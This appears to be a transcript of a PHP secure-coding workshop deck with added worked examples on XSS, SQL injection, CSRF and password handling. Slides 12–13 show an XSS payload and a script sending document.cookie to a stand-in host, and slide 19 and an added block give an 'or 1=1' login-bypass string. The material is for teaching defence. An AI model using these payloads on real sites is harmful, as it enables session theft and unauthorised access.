
PHP Security Bootcamp

The web is becoming a more and more dangerous place every day. You, as a PHP application developer, need to be armed with the tools and knowledge to make your applications as secure as possible. Come get hands-on training in applying secure design principles, testing code for vulnerabilities and fixing the problems we find together. We'll be using a vulnerable application to illustrate some of the most common vulnerabilities like cross-site scripting, SQL injection and other notables from the OWASP Top 10 list. You'll walk away with a grasp of good secure coding practices and a platform for future experimentation.

At Lone Star PHP 2015

Chris Cornutt

April 18, 2015

Transcript

  1. Secure PHP Development
    Chris Cornutt @enygma

  2. PHP Dev Years (the count did not survive extraction)
    Appsec Engineer
    http://websec.io
    http://securingphp.com

  3. Goals
    Basic appsec principles
    Vulnerabilities & Exploits
    Hands-on experience
    Tools & Techniques

  4. http://bit.ly/owasptop… (short link to the OWASP Top 10; the end of the URL was lost in extraction)

  5. There’s no such thing as secure

  6. https://github.com/psecio/notch
    Notch: A Vulnerable Application

  7. https://github.com/psecio/notch
    Setup Time
    or http://notch.securingphp.com

  8. (image-only slide)

  9. XSS: Cross Site Scripting

  10. Injection of content into the page
    usually Javascript
    reflected vs stored
    poor output escaping

  11. Context
    CSS:            style: foo-<?=$input?>
    Javascript:     var name = "<?=$input?>";
    HTML:           <?=$input?>
    HTML Attribute: …="<?=$input?>">foo   (the opening tag was lost in extraction)
    Query value:    $url = "http://foo.com?data=".$input

  12. Example
    <?php
    echo "Howdy, my name is ".$_GET['name'];
    ?>

    ?name=<script>alert("xss")</script>

  13. Example
    <script>
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open(
        'GET',
        'http://leethack.php?cookies='+document.cookie,
        true);
    xmlhttp.send();
    </script>
    Assumes a cross-origin policy of … (the value was lost in extraction)

  14. Your Turn

  15. Prevention #1
    <?php
    $name = htmlspecialchars(
        $_GET['name'], ENT_COMPAT, 'UTF-8'
    );
    echo "Howdy, my name is ".$name;
    ?>
    Note: This is only for an HTML context

  16. Prevention #2
    {{ name|e('html') }}
    {{ name|e('html_attr') }}
    {{ name|e('js') }}
    {{ name|e('css') }}
    Note: This example requires Twig
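Slide 15 notes that htmlspecialchars() with ENT_COMPAT covers only the HTML text context, and slide 11 lists four more. The following is an added example, not code from the deck or the Notch application: one escaper per context using PHP built-ins only, mirroring what Twig's e('html'), e('js') and e('css') filters on slide 16 do. The helper names (escHtml, escJs, escCss, escUrlParam) and the sample input are invented for this example.

```php
<?php
// Added example, not from the slides: one escaper per output context from
// slide 11. The slide 15 call uses ENT_COMPAT, which leaves single quotes
// alone, so it is fine for an HTML text node but not for a single-quoted
// attribute or a JavaScript string. Helper names are invented here.

function escHtml(string $s): string
{
    // Serves both the text-node and the quoted-attribute context: ENT_QUOTES
    // encodes ' and " as well as < > &; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string. The template must still put
    // quotes around the attribute value.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function escJs(string $s): string
{
    // json_encode yields a valid JavaScript string literal; the HEX flags turn
    // < > & ' " into \uXXXX so a closing </script> cannot be smuggled in.
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

function escCss(string $s): string
{
    // Hex-escape everything except ASCII letters and digits, the approach
    // Twig's css escaper takes: a backslash, the code point in hex, a space.
    return preg_replace_callback('/[^A-Za-z0-9]/u', function (array $m): string {
        return sprintf('\\%X ', mb_ord($m[0], 'UTF-8'));
    }, $s);
}

function escUrlParam(string $s): string
{
    // Query-string value: percent-encode first, then HTML-escape, because the
    // finished URL is itself written into an href attribute.
    return escHtml(rawurlencode($s));
}

// Constructed input that would break out of every context if echoed raw.
$input = "' \"><script>alert(\"xss\")</script>";

printf("<p>Howdy, my name is %s</p>\n", escHtml($input));
printf("<input value='%s'>\n", escHtml($input));
printf("<script>var name = %s;</script>\n", escJs($input));
printf("<div style=\"foo-%s\"></div>\n", escCss($input));
printf("<a href=\"http://foo.com?data=%s\">foo</a>\n", escUrlParam($input));
```

Run it with `php` from the command line and compare the five output lines: the same input is rendered five different ways, and in none of them does the browser see a script element or a terminated quote. The point the deck makes on slide 15 holds in reverse too: an escaper chosen for one context does not protect another, so the template, not the data, decides which one to call.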

  17. SQLi: SQL Injection

  18. Injection specific to SQL statements
    expose data
    bypass auth mechanisms
    poor input filtering

  19. Example
    $sql = 'select id
        from users
        where username = "'.$_POST['username'].'"
        and password = "'.$_POST['password'].'"';

    password=" or 1=1; #

    select id
    from users
    where username = "user1"
    and password = "" or 1=1; #

  20. (image-only slide)

  21. (image-only slide)

  22. Prepared statements
    PDO
    Mysqli

  23. Your Turn

  24. Prevention
    <?php
    $stmt = $dbh->prepare('select id from users'
        .' where username = :user'
        .' and password = :pass');
    $stmt->execute(array(
        'user' => $_POST['username'],
        'pass' => $_POST['password']
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    Note: This example requires PDO support
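To see the difference between slide 19 and slide 24 run end to end, here is an added example (not from the deck) that puts both queries in front of an in-memory SQLite database. The table, the single user row and the form input are constructed in the script; SQLite uses single-quoted strings and `--` comments, so the input is the slide's "or 1=1" trick written in that dialect rather than with MySQL's `"` and `#`. The function names are invented for this example.

```php
<?php
// Added example, not from the slides. Needs only ext/pdo_sqlite; the table,
// the one user and the "form input" are all constructed below.

$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('create table users (id integer primary key, username text, password text)');
$dbh->exec("insert into users (username, password) values ('user1', 'correct horse')");

// Constructed POST data: a real username and, in the password field, a
// fragment of SQL instead of a password (SQLite dialect of slide 19's input).
$post = ['username' => 'user1', 'password' => "' or 1=1 --"];

// Vulnerable: string concatenation, as on slide 19.
function loginConcatenated(PDO $dbh, array $post): array
{
    $sql = "select id from users where username = '" . $post['username'] . "'"
         . " and password = '" . $post['password'] . "'";
    // The database now receives:
    //   ... where username = 'user1' and password = '' or 1=1 --'
    // and "or 1=1" makes the whole WHERE clause true for every row.
    return $dbh->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: placeholders, as on slide 24. The statement text is fixed before
// any user data arrives, so the input can only ever be a value.
function loginPrepared(PDO $dbh, array $post): array
{
    $stmt = $dbh->prepare('select id from users where username = :user and password = :pass');
    $stmt->execute(['user' => $post['username'], 'pass' => $post['password']]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

var_dump(loginConcatenated($dbh, $post)); // one row: id 1, login bypassed
var_dump(loginPrepared($dbh, $post));     // empty array: no such password
```

Two caveats a practitioner should keep in mind. First, on MySQL set `PDO::ATTR_EMULATE_PREPARES` to `false` so the server, not the client library, separates query text from parameters. Second, the query still compares the password column in plaintext to stay parallel with the slide; slide 32's "plaintext passwords" item is the reason a real login compares a hash instead.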

  25. CSRF: Cross Site Request Forgery

  26. unvalidated form submission
    on all state changes
    what’s the source?
    simple
    randomized for each form

  27. Example (the form markup on this slide did not survive extraction)

  28. Example
    <input … value="098f6bcd4621d373cade4e832627b4f6"
        name="csrf-token"/>
    (the remaining attributes of the tag were lost in extraction)
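Slide 26 lists the properties a CSRF defence needs: a token on every state change, tied to its source, simple, and randomized per form. The following added example (not code from the deck) implements that with a session-bound token: the hidden field keeps the `csrf-token` name from slide 28, but its value comes from `random_bytes()` rather than a fixed string, it is checked only on state-changing methods, compared with `hash_equals()`, and consumed after one use. The helper names and the sample requests are invented for this example.

```php
<?php
// Added example, not from the slides: per-form CSRF tokens kept in the session.

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Issue a fresh random token for a named form and remember it server-side.
function csrfTokenFor(string $formName): string
{
    $token = bin2hex(random_bytes(32));
    $_SESSION['csrf'][$formName] = $token;
    return $token;
}

// Render the hidden field for a form. The token is hex, so the
// htmlspecialchars() call is purely defensive.
function csrfField(string $formName): string
{
    return '<input type="hidden" name="csrf-token" value="'
        . htmlspecialchars(csrfTokenFor($formName), ENT_QUOTES, 'UTF-8') . '"/>';
}

// Validate a submission. GET never changes state, so it carries no token;
// for the other methods the submitted value must match the stored one, and a
// matched token is discarded so it cannot be replayed.
function csrfValid(string $formName, string $method, array $post): bool
{
    if (!in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'], true)) {
        return true;
    }
    $expected = $_SESSION['csrf'][$formName] ?? null;
    $given = $post['csrf-token'] ?? null;
    $ok = is_string($expected) && is_string($given) && hash_equals($expected, $given);
    if ($ok) {
        unset($_SESSION['csrf'][$formName]);
    }
    return $ok;
}

// Walk-through with constructed requests.
$html = csrfField('change-email');               // the server renders the form
preg_match('/value="([0-9a-f]+)"/', $html, $m);  // the user's browser sends it back
$legitimate = ['csrf-token' => $m[1], 'email' => 'me@example.com'];
$forged     = ['email' => 'attacker@example.com']; // a cross-site form has no token

var_dump(csrfValid('change-email', 'POST', $forged));     // bool(false)
var_dump(csrfValid('change-email', 'POST', $legitimate)); // bool(true)
var_dump(csrfValid('change-email', 'POST', $legitimate)); // bool(false): already used
var_dump(csrfValid('change-email', 'GET', $forged));      // bool(true): GET is not checked
```

The per-form key is what makes the token "randomized for each form": a token issued for one form is not accepted by another. Rejecting a missing or non-string token before calling `hash_equals()` matters because that function raises a TypeError on anything but strings, which would otherwise turn a malformed request into a server error.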

  29. Auth*: Authentication & Authorization

  30. direct object reference (A…; the rest of this label was lost in extraction)
    data access
    dangerous actions
    poor user management

  31. Your Turn

  32. plaintext passwords
    no password policy
    overly complex passwords
    password hints
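Two of the Auth* points, the ownership check that a direct object reference needs (slide 30) and storing password hashes rather than plaintext (slide 32), are shown together in this added example, which is not code from the deck or the Notch application. It uses an in-memory SQLite database with constructed rows; the function names and sample users are invented for this example.

```php
<?php
// Added example, not from the slides: password hashing and an owner-scoped
// lookup for a direct object reference. Needs only ext/pdo_sqlite.

$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('create table users (id integer primary key, username text, password_hash text)');
$dbh->exec('create table invoices (id integer primary key, owner_id integer, total real)');

// Hash on the way in. The policy is a length floor only, not the "overly
// complex" rules slide 32 warns about; the hash carries its own salt and cost.
function registerUser(PDO $dbh, string $username, string $password): int
{
    if (mb_strlen($password) < 12) {
        throw new InvalidArgumentException('password must be at least 12 characters');
    }
    $stmt = $dbh->prepare('insert into users (username, password_hash) values (:u, :h)');
    $stmt->execute(['u' => $username, 'h' => password_hash($password, PASSWORD_DEFAULT)]);
    return (int) $dbh->lastInsertId();
}

// Verify on the way out; returns the user id or null.
function authenticate(PDO $dbh, string $username, string $password): ?int
{
    $stmt = $dbh->prepare('select id, password_hash from users where username = :u');
    $stmt->execute(['u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify against a throwaway hash when the user is unknown, so a bad
    // username costs the same time as a bad password.
    $hash = $row ? $row['password_hash'] : password_hash('placeholder', PASSWORD_DEFAULT);
    $verified = password_verify($password, $hash);
    if (!$row || !$verified) {
        return null;
    }
    // Upgrade old hashes transparently when the default cost or algorithm moves.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $upd = $dbh->prepare('update users set password_hash = :h where id = :id');
        $upd->execute(['h' => password_hash($password, PASSWORD_DEFAULT), 'id' => $row['id']]);
    }
    return (int) $row['id'];
}

// Direct object reference: the id from the URL is never enough on its own.
// The owner check is part of the query, so a guessed id for someone else's
// row simply finds nothing.
function invoiceForUser(PDO $dbh, int $userId, int $invoiceId): ?array
{
    $stmt = $dbh->prepare('select id, total from invoices where id = :id and owner_id = :owner');
    $stmt->execute(['id' => $invoiceId, 'owner' => $userId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed data: two users, one invoice each.
$alice = registerUser($dbh, 'alice', 'correct horse battery');
$bob   = registerUser($dbh, 'bob', 'staple battery horse');
$dbh->exec("insert into invoices (owner_id, total) values ($alice, 10.5), ($bob, 99.0)");

var_dump(authenticate($dbh, 'alice', 'correct horse battery')); // int(1)
var_dump(authenticate($dbh, 'alice', 'wrong password'));        // NULL
var_dump(authenticate($dbh, 'nobody', 'correct horse battery')); // NULL
var_dump(invoiceForUser($dbh, $alice, 1));                      // ['id' => 1, 'total' => 10.5]
var_dump(invoiceForUser($dbh, $alice, 2));                      // NULL: that row belongs to bob
```

The same shape applies to the "dangerous actions" item on slide 30: the user id comes from the authenticated session, never from the request, and it is bound into the query rather than checked afterwards in PHP.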

  33. (image-only slide)

  34. (image-only slide)

  35. But wait, there’s more…

  36. Security Misconfiguration
    Sensitive Data Exposure
    Components with Known Vulnerabilities
    Unvalidated Redirects and Forwards

  37. That’s all folks
    @enygma
    @securingphp
    http://securingphp.com